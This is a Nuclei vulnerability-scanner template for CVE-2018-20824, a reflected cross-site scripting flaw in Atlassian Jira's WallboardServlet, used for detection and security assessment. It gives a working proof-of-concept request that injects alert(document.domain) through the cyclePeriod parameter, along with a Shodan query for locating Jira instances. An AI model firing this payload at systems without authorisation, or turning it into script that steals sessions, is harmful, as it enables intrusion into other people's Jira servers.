nuclei-templates/http/cves/2018/CVE-2018-20824.yaml

48 lines
1.9 KiB
YAML

id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69238
- https://nvd.nist.gov/vuln/detail/CVE-2018-20824
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting
- https://github.com/merlinepedra25/nuclei-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-20824
cwe-id: CWE-79
epss-score: 0.00203
epss-percentile: 0.58306
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: atlassian
product: jira
shodan-query: http.component:"Atlassian Jira"
tags: cve2018,cve,atlassian,jira,xss
http:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- (?mi)timeout:\salert\(document\.domain\)
- type: status
status:
- 200
# digest: 4b0a00483046022100cacbdeb0c0af358ac6503810fd58e5fc0911a7c724b4bd307787bc2a6ae191e5022100e3b0228d4c1ba7bf5ead1493a9895e11d08a9a54416af57cd5e6a90616e82cf6:922c64590222798bb761d5b6d8e72950